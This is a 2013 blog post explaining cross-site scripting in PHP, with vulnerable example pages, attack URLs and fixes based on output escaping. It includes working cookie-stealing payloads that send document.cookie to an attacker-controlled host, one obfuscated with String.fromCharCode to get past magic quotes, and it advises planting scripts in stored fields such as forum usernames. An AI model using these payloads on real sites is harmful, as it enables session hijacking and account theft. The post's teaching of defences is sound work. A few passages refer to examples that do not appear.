What is XSS and how to protect your website

Tags: webdevelopment, security, programming.
By lucb1e on 2013-02-07 22:42:23 +0100

Alternative title: How do XSS attacks work and how can you exploit it.
To secure things you must know how they work, right? ;) The post mainly focuses on how it works and how to protect your website though, so let's dive right into it.

First of all, XSS means cross-site scripting. The name is a bit misleading since it isn't necessarily cross-site, it's basically just inserting scripts at places where other users will unknowingly trigger them to run.
Wikipedia's Definition: "inject client-side script into Web pages viewed by other users".

This kind of attack is possible when output isn't escaped. For clarity, by escaping I mean the process of converting data to a format where it is non-executable in the place where it is used. Like <script>alert(1);</script> is executable when used in HTML, but not when insert into a database.

The difference between input and output escaping is quite thin. When inserting data into a database that the user inputted, you could say that it's output escaping because you're outputting it to the database. I like to define the difference as storing or displaying the data. This makes XSS an output escaping problem, and not input escaping. Of course both should be done, and at the appropriate time. Input escaping when you're inserting the data into the database, and output escaping when you display it to the user.

But I'll get back on this later. Let's first talk some more about XSS attacks. For example, this is a vulnerable page:
<?php echo $_GET["test"];
Because this way you can make someone run Javascript:

So far it seems harmless, and it is. But what if your website has a login system? As you know, the cookie keeps users logged in between pages (session_start() does that). So now if you do...
example.com/page.php?test=<script>location="http://yoursite/log.php?c=" + document.cookie;</script>
This allows you to see the cookie from whoever is logged in, after which you can impersonate them. Worse, on a banking site you could use an xss attack to change whom the money is being sent to.

Some websites have so-called magic quotes, which automatically escape any quotes and backslashes: " to \", ' to \' and \ to \\. This is to prevent SQL injections, and it also partially helps against XSS because any quote would break the Javascript code with a syntax error. However, there is a solution for everything, and this totally circumvents the fix:
Of course this is very long, and may exceed some maximum length. Doing some minification, we get this:

example.com/page.php?test=<script>function c(n){return String.fromCharCode(n);}location=c(121)+c(111)+c(117)+c(114)+c(115)+c(105)+c(116)+c(101)+c(46)+c(116)+c(108)+c(100)+c(47)+c(63)+document.cookie</script>
Not small, but doable, and it works. What is this actually? Well every character has a code, for example the letter A is code 65. Converting text to code can be done with a little (maybe self-written) script, like this one: http://jsfiddle.net/xq2b2/

There are two problems with this approach though: 1) you still need to get people to open that link, and 2) Chrome prevents doing this. Chrome blocks any scripts that are in the request, so like in a script embedded in a $_GET or $_POST parameter. But Internet Explorer will happily execute that script for you, so odds are it's no problem.

The best way to execute XSS is to find a field that gets displayed to others and is not protected, because this circumvents both of these two problems. People will automatically visit the page sooner or later, and Chrome will also execute it. For example, if you can use a <script> tag in your username when registering on a forum, you can execute any javascript on the computers of every visitor!

How to protect your site against XSS?
In PHP, when outputting to HTML, use htmlspecialchars():
<?php echo htmlspecialchars($_GET["test"]);

Now any attack like in the example above will be impossible, because you can't use the <script> tag. It will be encoded to &lt;script&gt;.

However, you must always encode the output for whatever language you are using the data in! For example on following page, you can still use XSS because you formatted the data for HTML instead of Javascript:
userid = "<?php echo htmlspecialchars($_GET["userid"]);?>";
alert("Hello, " + getUserById(userid));

Exploit: example.com/page.php?userid=";location="http://yoursite.tld/?" + document.cookie + "

Fix: By escaping ", you can't do this anymore. But if you replace all " with \", even then you need to use htmlspecialchars, because </script> works even inside strings. It will end the JS block and start on HTML, which you can then change back to JS to start XSS. Example page:
userid = "<?php echo str_replace('"', '\\"', $_GET["userid"]);?>";
alert("Hello, " + getUserById(userid));

In case you don't recognize it, this code is just standard URL encoding. Again a form of escaping actually, because if you have a file named "a?b" this won't work: "example.com/a?b". You need to escape the "?" to %3F (so it becomes "example.com/a%3Fb"). You can decode it with unescape in Javascript() or urldecode() in PHP. Anyway...

Fix: userid = "<?php echo htmlspecialchars(str_replace('"', '\\"', $_GET["userid"]));?>";

A little more about input and output escaping
The thing is that you should do input escaping when storing the data, and output escaping when displaying it (as I said before). You can also do output escaping when storing the data, and that would succesfully prevent an attack, but it's not a great solution. I'll give some examples first:

Input escaping:
query("INSERT INTO users (name) VALUES('" . escape($_GET["user"]) . "')");

Output escaping and displaying:
echo htmlspecialchars(query("SELECT name FROM users WHERE userid = 1"));

Output escaping on top of input escaping, then displaying:
$user = htmlspecialchars(escape($_GET["user"]));
query("INSERT INTO users (name) VALUES('$user')");
echo query("SELECT name FROM users WHERE id = " . just_inserted_id());

Both methods are secure (input and then output, or on top of each other). However, when doing only input escaping, the database will store the correct username. When doing it on top of each other, the database will store the value escaped for HTML. If you are then using the username in Javascript, it will display incorrectly, and possibly insecurely.

Moreover, when storing the escaped value (for whatever language), it takes more storage space. Every < will take 4 times as much space as it normally would. To be fair though, there is also something to say for the processing power it takes to escape the data every time you display it, instead of doing it once when storing. So it depends on the circumstances, though I'd generally advise to do the right escaping at the right time.

Related / recommended further reading: lucb1e.com/!csrf
Another post tagged 'security': CSRF: It's not trivial

Look for more posts tagged programming, security or webdevelopment.

Previous post - Next post